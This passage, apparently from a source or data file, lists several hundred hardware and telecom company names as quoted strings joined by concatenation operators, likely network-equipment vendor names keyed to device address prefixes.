N.v.", + "Novo Nordisk A/S", + "Cubic Defense Simulation Systems", + "Echo Digital Audio Corporation", + "Aurora Networks", + "Qwerty Elektronik AB", + "Empower Technologies(Canada) Inc.", + "Keri Systems, Inc", + "Wiline Networks, Inc.", + "Coder Electronics Corporation", + "Srisa", + "CoreStar International Corp", + "Axell Wireless Limited", + "KeyEye Communications", + "Battelle Memorial Institute", + "Extricom Ltd", + "Electronics Design Services, Co., Ltd.", + "MaxStream, Inc", + "ALGOSYSTEM Co., Ltd.", + "TrafficSim Co.,Ltd", + "Intec Automation inc.", + "Suzhou Keda Technology CO.,Ltd", + "RSE Informations Technologie GmbH", + "Eka Systems Inc.", + "J-S Co. NEUROCOM", + "Galactic Computing Corp.", + "Sidsa", + "GeoVision Inc.", + "Adapt4, LLC", + "Abbott Diagnostics", + "SPIDCOM Technologies SA", + "IONOS Co.,Ltd.", + "Carallon Limited", + "Sendo Ltd", + "ALS & TEC Ltd.", + "JBX Designs Inc.", + "Tenosys, Inc.", + "kk-electronic a/s", + "Dage-MTI of MC, Inc.", + "Artimi Ltd", + "Advanced Motion Controls", + "Engim, Inc.", + "VadaTech Inc.", + "Sitronics Telecom Solutions", + "ioIMAGE Ltd.", + "Acbel Polytech Inc.", + "Panta Systems, Inc.", + "Phantom Technologies LLC", + "WiMedia Alliance", + "HYDAC Filtertechnik GMBH", + "Inepro BV", + "ToGoldenNet Technology Inc.", + "Arkados, Inc.", + "Orient Power Home Network Ltd.", + "Beijing Topsec Network Security Technology Co., Ltd.", + "NxtPhase T&D, Corp.", + "Techmetro Corp.", + "Tentaculus AB", + "Hach Lange Sarl", + "Focusrite Audio Engineering Limited", + "Ocean Broadband Networks", + "LiteTouch, Inc.", + "Verascape, Inc.", + "Lely Industries N.V.", + "GateConnect", + "Uryu Seisaku, Ltd.", + "Flaircomm Technologies Co. LTD", + "Advance Wireless Technology Corp.", + "Efore Oyj (Plc)", + "Dolby Australia", + "ThingMagic, LLC", + "SunCorp Industrial Limited", + "Invento Networks, Inc.", + "Viseon, Inc.", + "Gossen-Metrawatt-GmbH", + "Time America, Inc.", + "G2 Microsystems", + "Ktech Telecommunications Inc", + "Sentilla Corporation", + "CG Power Systems Ireland Limited", + "Measurement Computing Corp", + "Stoke Inc", + "Value Electronics", + "daum electronic gmbh", + "Adaptix, Inc", + "Stanton Magnetics,inc.", + "Woodward Governor", + "ABB Switzerland Ltd.", + "Sumitomo Electric Device Innovations, Inc", + "Addlogix", + "TechVoIP Sp z o.o.", + "Tokyo Aircaft Instrument Co., Ltd.", + "Citronix, LLC", + "VIA Networking Technologies, Inc.", + "Amoi Electronics Co.,Ltd", + "Signal Technology - AISD", + "Motion Control Systems, Inc.", + "NexQL Corporation", + "Dedicated Devices, Inc.", + "ActivNetworks", + "AIRAYA Corp", + "woori-net", + "Asia Pacific Microsystems , Inc.", + "Wideful Limited", + "QinetiQ Ltd", + "Uniclass Technology, Co., LTD", + "BlueExpert Technology Corp.", + "Land-Cellular Corporation", + "Perception Digital Ltd", + "TiVo", + "Thrane & Thrane A/S", + "NetEnrich, Inc", + "Hangzhou Sunyard System Engineering Co.,Ltd.", + "Guangzhou Jinpeng Group Co.,Ltd.", + "Raymarine UK Ltd", + "MTT Corporation", + "Protechna Herbst GmbH & Co. KG", + "General Datacomm LLC", + "ICP Internet Communication Payment AG", + "iStor Networks, Inc.", + "Sypixx Networks", + "Manufacturing Technology Inc", + "Solectron Brazil", + "Shenzhen Powercom Co.,Ltd", + "Bombardier Transportation", + "802 Global", + "Pleora Technologies Inc.", + "Doremi Labs, Inc.", + "Hectrix Limited", + "Solteras, Inc.", + "Humo Laboratory,Ltd.", + "Midmark Corp", + "Eidsvoll Electronics AS", + "Belkin Corporation", + "Taelim Electronics Co., Ltd.", + "ACARD Technology Corp.", + "Sevis Systems", + "Telecard-Pribor Ltd", + "caffeina applied research ltd.", + "GoodMan Corporation", + "Viewtran Technology Limited", + "Singular Technology Co. Ltd.", + "SMART Storage Systems", + "IZT GmbH", + "DataWind Research", + "EWA Technologies, Inc.", + "Kikusui Electronics Corp.", + "Gigabit Systems Inc.", + "APAC opto Electronics Inc.", + "Lobos, Inc.", + "Cylon Controls", + "Ueda Japan Radio Co., Ltd.", + "Guntermann & Drunck GmbH", + "GN&S company", + "Harman Music Group", + "Soundcraft", + "EverFocus Electronics Corp.", + "Tsurusaki Sealand Transportation Co. Ltd.", + "SANBlaze Technology, Inc.", + "BWA Technology GmbH", + "Broadband Pacenet (India) Pvt. Ltd.", + "Siemens NV (Belgium)", + "Dialog Inc.", + "Wasabi Systems Inc.", + "Polypix Inc.", + "StreamScale Limited", + "Robox Spa", + "Cellink", + "Allied Vision Technologies Canada Inc", + "Augmentix Corporation", + "TEAL Electronics, Inc.", + "Dongyang Telecom Co.,Ltd.", + "Aerotelecom Co.,Ltd.", + "RS Automation Co., Ltd", + "Datacap Systems Inc", + "Wintec Industries, inc.", + "Maxcess International", + "Trinity Security Systems,Inc.", + "Nicety Technologies Inc. (NTS)", + "Peribit Networks", + "Qamcom Technology AB", + "Midas Engineering", + "Endeleo Limited", + "Industrial Control Systems", + "Cosmo Techs Co., Ltd.", + "Ego Systems Inc.", + "Real ID Technology Co., Ltd.", + "Jay How Technology Co.,", + "Sbc Asi", + "REA Elektronik GmbH", + "E-TEN Information Systems Co., Ltd.", + "Shadong Luneng Jicheng Electronics,Co.,Ltd", + "Metanoia Technologies, Inc.", + "Castel", + "Adimos Systems LTD", + "Asix Electronics Corp.", + "Remsdaq Limited", + "Mcharge", + "Cray Inc", + "TEMIC SDS GmbH", + "Open Telecom", + "Cubic Defense Applications, Inc.", + "SparkLAN Communications, Inc.", + "Navico Auckland Ltd", + "Visionary Solutions, Inc.", + "IAV GmbH", + "Ermme", + "C-guys, Inc.", + "Accu-Sort Systems inc.", + "Sakuma Design Office", + "Televes S.A.", + "Tpack A/S", + "MAT S.A. (Mircrelec Advanced Technology)", + "4G Systems GmbH & Co. KG", + "Auvitran", + "Av Tech Corporation", + "Hitachi Industry & Control Solutions, Ltd.", + "E-TOP Network Technology Inc.", + "Shuko Electronics Co.,Ltd", + "Cirrus Logic", + "Hawking Technologies, Inc.", + "adp Gauselmann GmbH", + "New York Air Brake Corp.", + "Lipman TransAction Solutions", + "Sun Optronics Inc", + "Crere Networks, Inc.", + "MyA Technology", + "Heraeus Electro-Nite International N.V.", + "Winners Electronics Co., Ltd.", + "Koden Electronics Co., Ltd.", + "Groupe Txcom", + "Cidra Corp.", + "Tait Electronics", + "Joyteck Co., Ltd.", + "CMZ Sistemi Elettronici", + "Iti Ltd", + "O'rite Technology Co.,Ltd", + "ESA elettronica S.P.A.", + "Huges Hi-Tech Inc.,", + "NDS Limited", + "Komax AG", + "Atrie", + "Watertek Co.", + "Micro Control Systems Ltd.", + "ITFOR Inc.", + "Hauppauge Computer Works, Inc.", + "Schiller Ag", + "Emcore Corporation", + "Nedap N.v.", + "Kenwood Corporation", + "Collex", + "DRS Tactical Systems Inc.", + "Audio BU - Logitech", + "Hammerhead Systems, Inc.", + "APLUX Communications Ltd.", + "Tiesse SpA", + "Wu Han Routon Electronic Co., Ltd", + "Microelectronics Technology Inc.", + "Mustek System Inc.", + "Control Techniques", + "ITSupported, LLC", + "Compulogic Limited", + "Comart system", + "Steag ETA-Optik", + "Codian Ltd", + "boca systems", + "NCT Deutschland GmbH", + "Axiowave Networks, Inc.", + "Metro (Suzhou) Technologies Co., Ltd.", + "StorCase Technology, Inc.", + "Innominate Security Technologies AG", + "Interface Masters, Inc", + "UNION co., ltd.", + "Lea", + "Medion Ag", + "Apache Micro Peripherals, Inc.", + "Network Technologies Inc", + "Internet Information Image Inc.", + "Matrics, Inc.", + "MRO-TEK Realty Limited", + "Digital Systems Corp", + "Hyundai ImageQuest Co.,Ltd.", + "Iskraemeco", + "Genera Oy", + "Garuda Networks Corporation", + "CNMP Networks, Inc.", + "Prettl Elektronik Radeberg GmbH", + "Nallatech Ltd", + "Positron Public Safety Systems inc.", + "HITEL LINK Co.,Ltd", + "AC Electric Vehicles, Ltd.", + "Aeroscout Ltd.", + "Intelligent Computer Solutions Inc.", + "ALPHA PROJECT Co.,Ltd.", + "Life Racing Ltd", + "X2 MSA Group", + "IBSmm Embedded Electronics Consulting", + "Calypso Medical", + "AC Tech corporation DBA Advanced Digital", + "Avtec, Inc.", + "Cheops Elektronik", + "RPA Reserch Co., Ltd.", + "Sammy Corporation", + "OCTTEL Communication Co., Ltd.", + "Double D Electronics Ltd", + "MicroWeb Co., Ltd.", + "National Radio Astronomy Observatory", + "Pronto Networks Inc", + "Animation Technologies Inc.", + "MediaChorus, Inc.", + "Techno-One Co., Ltd", + "TelcoBridges Inc.", + "Winbest Technology CO,LT", + "BIOTRONIK GmbH & Co", + "WOOJU COMMUNICATIONS Co,.Ltd", + "Metalligence Technology Corp.", + "Micro Systems Co.,Ltd.", + "RiT technologies Ltd.", + "Datel Electronics", + "Vitals System Inc.", + "General Hydrogen", + "Chih-Kan Technology Co., Ltd.", + "Systegra AG", + "Code Corporation", + "Shenzhen RouterD Networks Limited", + "Shanghai Sibo Telecom Technology Co.,Ltd", + "CASTEL Broadband Limited", + "Solomon Extreme International Ltd.", + "Digital Monitoring Products, Inc.", + "Advantech Technology (CHINA) Co., Ltd.", + "Harmonic, Inc", + "Micetek International Inc.", + "INITIUM Co., Ltd.", + "Solectron Japan Nakaniida", + "ib-mohnen KG", + "Kieback & Peter GmbH & Co KG", + "Topview Technology Corporation", + "sofrel", + "Ambri Limited", + "Kilchherr Elektronik AG", + "Visimetrics (UK) Ltd", + "Manufacture Des Montres Rolex Sa", + "Danfoss Inc.", + "KAPPA opto-electronics GmbH", + "SIBCO bv", + "American Telecare Inc.", + "MKS Instruments", + "Aiptek International Inc", + "ShangHai cellink CO., LTD", + "SONICblue, Inc.", + "Presonus Corporation", + "Eracom Technologies", + "Crinis Networks, Inc.", + "SVM Microwaves s.r.o.", + "Mitsubishi Electric System & Service Co.,Ltd.", + "Shimafuji Electric Co.,Ltd.", + "FEI Electron Optics", + "Hochiki Corporation", + "Unication Group", + "Hirota Ss", + "Seabridge Ltd.", + "MPLS Forum", + "Stec, Inc.", + "Avrio Technologies, Inc", + "Happy Communication Co., Ltd.", + "Binatone Electronics International, Ltd", + "CoreBell Systems Inc.", + "YOKOYAMA SHOKAI CO.,Ltd.", + "Radiantech, Inc.", + "TerraTec Electronic GmbH", + "PLAT'C2,Inc", + "Salto Systems S.l.", + "Lenze", + "Remotek Corporation", + "Freyer & Siegel Elektronik GmbH & Co. KG", + "UNITEK Electronics INC.", + "Elo Sistemas Eletronicos S.A.", + "Aro Welding Technologies Sas", + "Shenzhen Eastern Digital Tech Ltd.", + "SOHOware, Inc.", + "Meikyo Electric Co.,Ltd", + "HCV Consulting", + "RLX Technologies", + "SVA Networks, Inc.", + "Octave Communications", + "Valere Power, Inc.", + "Hottinger Brüel & Kjaer GmbH", + "Samjin Information & Communications Co., Ltd.", + "Xemics S.a.", + "iMaxNetworks(Shenzhen)Limited.", + "ExPet Technologies, Inc", + "Ilryung Telesys, Inc", + "Scientific Research Corporation", + "Daktronics, Inc.", + "ADC Techonology", + "iAd GmbH", + "Data East Corporation", + "Network Systems Group, Ltd. (NSG)", + "Vista Control Systems, Corp.", + "Glyph Technologies Inc.", + "Kanematsu Electronics, Ltd.", + "Onkyo Technology K.K.", + "Netcontrol Oy", + "Haliplex Communications", + "Technoventure, Inc.", + "Switchgear and Instrumentation Ltd", + "YOZAN Inc.", + "Testech, Inc.", + "Proces-Data A/S", + "Cp Georges Renault", + "Cronyx Engineering", + "Nudian Electron Co., Ltd.", + "ipcas GmbH", + "Advanced Television Systems Committee, Inc.", + "Dominion Lasercom Inc.", + "Trimble Europe Bv", + "MathStar, Inc.", + "Action Imaging Solutions", + "Lanvoice", + "Jacques Technologies P/L", + "Sandvine Incorporated", + "Ipetronik GmbH & Co. KG", + "Inventec Appliance Corp", + "BlueKorea Co., Ltd.", + "Utc Ccs", + "Wany", + "Mitadenshi Co.,LTD", + "Vanguard Networks Solutions, LLC", + "With-Net Inc", + "Remotec, Inc.", + "Karel Inc.", + "3UP Systems", + "ATO Technology Ltd.", + "Envenergy Inc", + "IDK Corporation", + "SystemK Corporation", + "Helix Technology Inc.", + "Cluster Labs GmbH", + "Double-Win Enterpirse CO., LTD", + "MYTECS Co.,Ltd.", + "VSN Systemen BV", + "Tmt", + "Homag AG", + "InPro Comm", + "Ipsil, Incorporated", + "Texa Corp.", + "Koei Engineering Ltd.", + "Indus Teqsite Private Limited", + "Nuance Document Imaging", + "Plasmon LMS", + "PurOptix", + "Command-e Technology Co.,Ltd.", + "NEC Eluminant Technologies, Inc.", + "SoftEnergy Co., Ltd.", + "Lyan Inc.", + "EM Solutions", + "Quanta Network Systems Inc.", + "Minds@Work", + "Maschinenfabrik Reinhausen GmbH", + "Liebert-Hiross Spa", + "RTX Telecom A/S", + "SDSystem", + "Rasvia Systems, Inc.", + "Hyglo AB", + "TIL Technologies", + "Tepg-Us", + "PacketFront Network Products AB", + "Qualstar Corporation", + "Netronix, Inc.", + "Shanghai Dare Technologies Co. Ltd.", + "iLogic Inc.", + "Netbind, Inc.", + "Stotz Feinmesstechnik GmbH", + "Contex A/S", + "Ilevo AB", + "Radionet Ltd.", + "JEAN Co. Ltd.", + "Thomson", + "Logopak Systeme GmbH & Co. KG", + "Technol Seven Co., Ltd.", + "Synectics Systems Limited", + "Armillaire Technologies, Inc.", + "Candera Inc.", + "Y.D.K Co. Ltd.", + "Golden Electronics Technology Co., Ltd.", + "Telecom Technology Ltd.", + "Samurai Ind. Prods Eletronicos Ltda", + "Office Details, Inc.", + "Cos Tron", + "Techno-Holon Corporation", + "LANergy Ltd.", + "Rigaku Corporation", + "Splicecom", + "Neuro Telecom Co., Ltd.", + "Kumoh Electronic Co, Ltd", + "Anoto AB", + "Motah Ltd.", + "Garz & Fricke GmbH", + "SoftRadio Co., Ltd.", + "Xyterra Computing, Inc.", + "Topcall International AG", + "Beicom Inc.", + "Beijing Qxcomm Technology Co., Ltd.", + "Intransa, Inc.", + "AAEON Technology Inc.", + "Bematech International Corp.", + "ELCON Systemtechnik GmbH", + "Satelsa Sistemas Y Aplicaciones De Telecomunicaciones, S.A.", + "Trutzschler GmbH & Co. KG", + "Sinetica Corporation Limited", + "Synoptics Limited", + "Ascom Powerline Communications Ltd.", + "Daehanet, Inc.", + "Celleritas Inc.", + "Jade Quantum Technologies, Inc.", + "Soriya Co. Ltd.", + "ONStor, Inc.", + "Woojyun Systec Co., Ltd.", + "Neo Telecom", + "Fabricom", + "CNSystems", + "Telemax Co., Ltd.", + "CDVI Americas Ltd", + "General Research of Electronics, Inc.", + "Comjet Information Systems Corp.", + "Mitsui Zosen Systems Research Inc.", + "Optillion", + "MAT Co., Ltd.", + "Diamond Systems Corp.", + "Microtek International, Inc.", + "Banderacom, Inc.", + "Toplink C&C Corporation", + "Upponetti Oy", + "Rednix", + "Technical Marketing Research, Inc.", + "Sumitomo Metal Micro Devices, Inc.", + "United Internetworks, Inc.", + "egnite GmbH", + "Transmode Systems AB", + "Xalted Networks", + "Primarion", + "Universal Instruments Corp.", + "UNIQA, Inc.", + "Vicon Industries Inc.", + "Compuprint S.P.A.", + "Helmut Fischer GmbH Institut für Elektronik und Messtechnik", + "3M Deutschland GmbH", + "SONO Computer Co., Ltd.", + "Opthos Inc.", + "Korea Data Systems", + "ZARDCOM Co., Ltd.", + "yLez Technologies Pte Ltd", + "Goepel Electronic GmbH", + "Sonicwall", + "KB Electronics Ltd.", + "Arcturus Networks Inc.", + "MWE GmbH", + "RapidWAN, Inc.", + "Baker Hughes Inc.", + "Omni Directional Control Technology Inc.", + "Kawasaki Microelectronics Incorporated", + "eProduction Solutions, Inc.", + "@Track Communications, Inc.", + "Kleinknecht GmbH, Ing. Büro", + "CELOX Networks", + "Moore Industries International Inc.", + "Mediaport USA", + "Korea Computer Technology Co., Ltd.", + "Medison Co., Ltd.", + "DigiPower Manufacturing Inc.", + "Serial System Ltd.", + "Redswitch Inc.", + "Verytech", + "ROIS Technologies, Inc.", + "D&M Holdings Inc.", + "Netrake an AudioCodes Company", + "System Base Co., Ltd.", + "Trellis Photonics, Ltd.", + "Creativ Network Technologies", + "Brans Technologies, Inc.", + "Starent Networks", + "KDDI Network & Solultions Inc.", + "Genotech Co., Ltd.", + "Universal Control Solution Corp.", + "Cinta Networks", + "Leviton Network Solutions", + "Harbour Networks Ltd., Co. Beijing", + "New Focus, Inc.", + "CDS-Electronics BV", + "C.P. Technology Co., Ltd.", + "Leader Comm.co., Ltd", + "Valley Technologies, Inc.", + "Eagle Traffic Control Systems", + "Broadcom Technologies", + "Opentech Inc.", + "360 Systems", + "Intracom S.A.", + "F & S Elektronik Systeme GmbH", + "BTL System (HK) Limited", + "LEA*D Corporation, Inc.", + "Smartronix, Inc.", + "Acqis Technology", + "OptXCon, Inc.", + "Audiotonix Group Limited", + "AMB i.t. Holding", + "S.I. Soubou, Inc.", + "Bardac Corporation", + "Giantec, Inc.", + "Digital Fountain, Inc.", + "Takagi Industrial Co., Ltd.", + "Drew Technologies, Inc.", + "Softlink s.r.o.", + "Oki Electric Industry Co., Ltd", + "Titan Electronics, Inc.", + "IPWireless, Inc.", + "Essegi Srl", + "Ciac", + "SandStream Technologies, Inc.", + "Paxonet Communications, Inc.", + "Polestar Corp.", + "KDT Systems Co., Ltd.", + "SICOM Systems, Inc.", + "Systems Integration Solutions, Inc.", + "Pelago Networks", + "Jupiters Technology", + "EPOX Computer Co., Ltd.", + "DAKOS Data & Communication Co., Ltd.", + "Avalue Technology, Inc.", + "CYZENTECH Co., Ltd.", + "iPolicy Networks, Inc.", + "cyberPIXIE, Inc.", + "SONOS Co., Ltd.", + "Surgient Networks, Inc.", + "Ipanema Technologies", + "Knilink Technology, Inc.", + "TD Systems Corporation", + "Fibercycle Networks, Inc.", + "ipDialog, Inc.", + "Teltronic S.A.U.", + "NXTV, Inc.", + "Vivity, Inc.", + "Digitel S/A Industria Eletronica", + "Innocom, Inc.", + "Nexsan Technologies, Ltd.", + "Plast-Control GmbH", + "Intertex Data AB", + "Tejas Networks India Limited", + "Cogency Semiconductor, Inc.", + "Minet, Inc.", + "Wireless Networks, Inc.", + "Fusion X Co., Ltd.", + "Schubert System Elektronik Gmbh", + "Winmate Communication, Inc.", + "Lexar Media, Inc.", + "iMPath Networks, Inc.", + "Advanced Communications Co., Ltd.", + "RADVision, Ltd.", + "CML Emergency Services", + "Micronik Multimedia", + "RFTNC Co., Ltd.", + "OmniCluster Technologies, Inc.", + "NetKit Solutions, LLC", + "ZACCESS Systems", + "Xsense Technology Corp.", + "Watlow", + "IDOT Computers, Inc.", + "Oneline AG", + "Cicada Semiconductor, Inc.", + "Shinkawa Electric Co., Ltd.", + "Catapult Communications", + "OptiMight Communications, Inc.", + "Alloptic, Inc.", + "ETEN Technologies, Inc.", + "Actelis Networks, Inc.", + "Nippon Antenna Co., Ltd.", + "Aselsan A.S", + "Gigabit Wireless", + "TeraBeam Internet Systems", + "Fiber Logic Communications", + "Bticino Spa", + "Pos Data Company, Ltd.", + "Norscan Instruments, Ltd.", + "Tietech.Co., Ltd.", + "Gould Instrument Systems, Inc.", + "JC HYUN Systems, Inc.", + "Astrodesign, Inc.", + "NDC Infared Engineering", + "Fujitsu General Limited", + "Integrated Network Corporation", + "EMPEG Ltd", + "SEAKR Engineering, Inc.", + "Arm", + "Cognex Corporation", + "Pinetron Co., Ltd.", + "DXO Telecom Co., Ltd.", + "Maschoff Design Engineering", + "NetBotz, Inc.", + "ExiO Communications, Inc.", + "PDA Peripherals, Inc.", + "NICE Systems", + "Martin Professional A/S", + "Mirae Technology", + "Zetes Technologies", + "Vaone, Inc.", + "Kira Information & Communications, Ltd.", + "TAMI Tech Co., Ltd.", + "IBASE Technology, Inc.", + "Global Sun Technology, Inc.", + "Atheros Communications", + "Teleware Network Systems", + "SCI Systems (Kunshan) Co., Ltd.", + "Flying Packets Communications", + "Carrier Corporation", + "Datacard Group", + "Videoframe Systems", + "SURECOM Technology Co.", + "Selta Telematica S.p.a", + "Amer.com", + "Trilithic, Inc.", + "SMART Technologies, Inc.", + "Nadatel Co., Ltd", + "AudioRamp.com", + "Apex, Inc.", + "Broadframe Corporation", + "C-COR.net", + "Open Network Co., Ltd.", + "Data Track Technology PLC", + "Innovative Electronic Designs, Inc.", + "Bencent Tzeng Industry Co., Ltd.", + "Chengdu Maipu Electric Industrial Co., Ltd.", + "Serome Technology, Inc.", + "Adtec Corporation", + "VDSL Systems OY", + "Micrel-Synergy Semiconductor", + "Movita Technologies, Inc.", + "Effinet Systems Co., Ltd.", + "Supernet, Inc.", + "Leisure Time, Inc.", + "Avail Networks", + "Haedong Info & Comm Co., Ltd", + "Trango Systems, Inc.", + "Activetelco", + "VisionGlobal Network Corp.", + "Unify Networks, Inc.", + "Bodmann Industries Elektronik GmbH", + "TeraGlobal Communications Corp.", + "DoTop Technology, Inc.", + "Teleforce Co., Ltd.", + "Wayport, Inc.", + "IC-Net, Inc.", + "Fulltek Technology Co., Ltd.", + "Bmw Ag", + "Airspan Communications, Ltd.", + "ESS Technology, Inc.", + "Nature Worldwide Technology Corp.", + "SierraCom", + "Agere Systems", + "XESystems, Inc.", + "One Stop Systems", + "Canon Finetech Inc.", + "Micronpc.com", + "Alpha Data Parallel Systems, Ltd.", + "VitalPoint, Inc.", + "ThermoQuest", + "Capital Equipment Corporation", + "Darim Vision", + "Texio Technology Corporation", + "Force10 Networks, Inc.", + "Litton Marine Systems B.V.", + "Gigalink Co., Ltd.", + "General Bandwidth", + "Cis Technology Inc.", + "Cygnet Technologies, Inc.", + "Hioki E.e. Corporation", + "Vitana Corporation", + "DIGITAL DESIGN GmbH", + "Marconi Communications Inc.", + "Viveris Technologies", + "Westport Technologies", + "RTUnet (Australia)", + "Trend Communications, Ltd.", + "Hoffmann und Burmeister GbR", + "Acer Incorporated", + "Aravox Technologies, Inc.", + "WatchGuard Technologies, Inc.", + "DFI Inc.", + "G3M Corporation", + "Chromatek Inc.", + "Gilat Communications, Ltd.", + "Ensemble Communications", + "Extratech Corporation", + "Teledyne DALSA Inc.", + "Beckhoff Automation GmbH", + "InfoGear Technology Corp.", + "TELENET Co., Ltd.", + "Neighbor World Co., Ltd.", + "Hitachi Aloka Medical, Ltd.", + "Logical Co., Ltd.", + "Maatel", + "Sylantro Systems Corporation", + "Kb/Tel Telecomunicaciones", + "Bustec Production Ltd.", + "Santera Systems, Inc.", + "Harmonix Corporation", + "Integrated Systems Design", + "Ectel", + "Gre America, Inc.", + "Hsing Tech. Enterprise Co.,Ltd", + "ViaGate Technologies, Inc.", + "DSG Technology, Inc.", + "Workbit Corporation.", + "WAGO Kontakttechnik GmbH", + "Radcom Ltd.", + "Innovative Systems, L.L.C.", + "Woodwind Communications System", + "PowerCom Technology", + "Optronic AG", + "RiverDelta Networks", + "Tadiran Microwave Networks", + "TSI, Inc..", + "Neon Technology, Inc.", + "Procomp Informatics, Ltd.", + "Discovery Com", + "Zaffire", + "Softbook Press", + "Shuttle, Inc.", + "Vision Products Pty. Ltd.", + "DRS Technologies Canada Ltd", + "Ferran Scientific, Inc.", + "Zhongxing Telecom Ltd.", + "Connected Systems", + "Grass Valley, A Belden Brand", + "Somat Corporation", + "Dooin Electronics Co.", + "Dalian Daxian Network", + "Aethra Telecomunicazioni", + "Fujian Star Terminal", + "Xiox", + "Kerbango, Inc.", + "Orient Telecom Co., Ltd.", + "Indigita Corporation", + "Boenig Und Kallenbach Ohg", + "Orbit Avionic & Communication", + "Avio Digital, Inc.", + "Skystream, Inc.", + "Ac&T System Co., Ltd.", + "Safetran Systems Corp", + "Xn Technologies", + "Kathrein-Werke Kg", + "Bitswitch Ltd.", + "Southern Information", + "Network Equipment Technologies, Inc.", + "Smp", + "Regent Electronics Corp.", + "Novtek Test Systems", + "Astral Point", + "V-Bits, Inc.", + "Vcon Telecommunication Ltd.", + "Nexcomm Systems, Inc.", + "Elcard Wireless Systems Oy", + "Mimaki Engineering Co., Ltd.", + "Invertex, Inc.", + "Symbionics, Ltd.", + "Photon Dynamics Canada Inc.", + "Emutec Inc.", + "Carinthian Tech Institute", + "Cosine Communications", + "Cutler-Hammer, Inc.", + "Ascend Communications, Inc.", + "Tl Industries", + "Alantro Communications", + "Micromeritics Instrument", + "Presence Technology Gmbh", + "Taqua Systems, Inc.", + "Pathway, Inc.", + "Amaquest Computer Corp.", + "Iomega Corporation", + "The Industree B.v.", + "Sas Institute Inc.", + "Glenayre Western Multiplex", + "Sangoma Technologies", + "PCTVnet ASA", + "NALTEC, Inc.", + "Koga Electronics Co.", + "Tac Ab", + "Philips Broadband Networks", + "Future Plus Systems", + "Atlas Copco Tools Ab", + "Foresson Corporation", + "AirFiber, Inc.", + "Konica Minolta Holdings, Inc.", + "Dain Telecom Co., Ltd.", + "Les Technologies SoftAcoustik Inc.", + "Aiwa Co., Ltd.", + "Brand Innovators", + "Satchwell Control Systems, Ltd", + "Minerva Systems", + "Unicorn Computer Corp.", + "OpenCon Systems, Inc.", + "Beta Research", + "Pg Design Electronics, Inc.", + "Giddings & Lewis", + "Boser Technology Co., Ltd.", + "Megaton House, Ltd.", + "Omnisec Ag", + "Edeva, Inc.", + "ADS Technologies, Inc", + "Optimation, Inc.", + "Aval Communications", + "TollBridge Technologies, Inc.", + "Advanced Hi-Tech Corp.", + "Iris Technologies, Inc.", + "Chaintech Computer Co., Ltd.", + "Anchor Games", + "Picazo Communications, Inc.", + "Videojet Systems", + "HanA Systems Inc.", + "Baxall Security Ltd.", + "Sartorius Hamburg GmbH", + "Altiga Networks", + "Imagine Communications", + "Softcom Microsystems, Inc.", + "Personal Communications Technologies", + "Not Limited, Inc.", + "Moxa Technologies Corp., Ltd.", + "Flying Pig Systems/High End Systems Inc.", + "ClearOne, Inc.", + "One World Systems, Inc.", + "JK microsystems, Inc.", + "Optivision, Inc.", + "BRODEL GmbH", + "Fmt Aircraft Gate Support Systems Ab", + "Zypcom, Inc", + "Entridia Corporation", + "Tattile SRL", + "Aspect Electronics, Inc.", + "ALi Corporation", + "Neo Networks, Inc.", + "Honeywell-Dating", + "Waverider Communications (Canada) Inc.", + "Digital Controls", + "Delem Bv", + "Central System Research Co., Ltd.", + "Nec Do Brasil S.a.", + "Nishimu Electronics Industries Co., Ltd.", + "Selesta Ingegneria S.p.A.", + "Embedded Planet", + "Diablo Research Co. Llc", + "Helioss Communications, Inc.", + "InterAir Wireless", + "Inter-Tel Integrated Systems", + "Accelerated Networks, Inc.", + "Imci Technologies", + "Broadband Networks, Inc.", + "Objective Communications, Inc.", + "Axxcelera Broadband Wireless", + "Witcom, Ltd.", + "Cms Computers, Ltd.", + "Raptor Systems", + "Starguide Digital Networks", + "Umax Data Systems, Inc.", + "Johnson Controls, Inc.", + "Nbase Communications Ltd.", + "Globespan Semiconductor, Inc.", + "Bayly Communications, Inc.", + "Handlink Technologies, Inc.", + "Aurora Communications, Ltd.", + "Vectron Systems AG", + "Entrata Communications Corp.", + "Nec America, Inc.", + "Peco II, Inc.", + "Siemens Network Convergence LLC", + "Giga Fast E. Ltd.", + "Telena S.p.a.", + "Wireless OnLine, Inc.", + "Digital Lightwave, Inc.", + "8X8 Inc.", + "Pelcombe Group Ltd.", + "Teledyne LeCroy, Inc", + "CLP COMPUTER LOGISTIK PLANUNG GmbH", + "EION Inc.", + "Nx Server, Ilnc.", + "RITTAL-WERK RUDOLF LOH GmbH & Co.", + "Citel", + "Quantum Designs (H.k.) Ltd.", + "Segate Technology LLC", + "For-A Co., Ltd.", + "Cti Products, Inc.", + "Bristol Babcock, Inc.", + "Media4, Inc.", + "Telocity, Incorporated", + "Tns", + "Cable Television Laboratories, Inc.", + "Horanet", + "ARMA, Inc.", + "Actia", + "Net Insight Ab", + "Selsius Systems, Inc.", + "Winbond Electronics Corp.", + "Pavo, Inc.", + "K-Bot Communications", + "Unique Systems, Inc.", + "Fiberlane Communications", + "I-O Corporation", + "Rebel.com, Inc.", + "Radyne Corporation", + "Advanced Control Systems, Inc.", + "Pixel Vision", + "Hero Systems, Ltd.", + "Control Resources Corporation", + "Pmc-Sierra, Inc.", + "Prominet Corporation", + "Teles Ag", + "Sunshine Electronics, Inc.", + "Advanced-Vision Technolgies Corp.", + "Avalon Imaging Systems, Inc.", + "Sdl Communications, Inc.", + "Reson, Inc.", + "Virtual Access, Ltd.", + "Silicon Integrated Sys. Corp.", + "Midsco, Inc.", + "Trl Technology, Ltd.", + "Ast Computer", + "eac AUTOMATION-CONSULTING GmbH", + "Amazing Controls! Inc.", + "Xaqti Corporation", + "Si Electronics, Ltd.", + "Nokia Wireless Business Commun", + "WebSprint Communications, Inc.", + "AK-NORD EDV VERTRIEBSGES. mbH", + "ViaVideo Communications, Inc.", + "Telogy Networks, Inc.", + "Safe-com GmbH & Co. KG", + "AMTEC spa", + "Paradyne Corp.", + "LOGWARE GmbH", + "Dionex", + "Talx Corporation", + "InnoMediaLogic, Inc.", + "Artesyn Embedded Technologies", + "Beckman Lab. Automation Div.", + "Global Maintech, Inc.", + "Wiltron Co.", + "Eurotech Srl", + "That Corporation", + "General Dynamics Information Systems", + "Kodai Hitec Co., Ltd.", + "Byas Systems", + "Telrad", + "Tandberg Television As", + "Sanyo Denki Co., Ltd.", + "Pluto Technologies International Inc.", + "Realtek Semiconductor Corp.", + "KEBA GmbH", + "InnoSys, Inc.", + "Lynx System Developers, Inc.", + "Enginuity Communications", + "Multitech Systems, Inc.", + "Ardent Communications Corp.", + "Merrimac Systems Inc.", + "MICROWI ELECTRONIC GmbH", + "Executone Information Systems, Inc.", + "Genroco International, 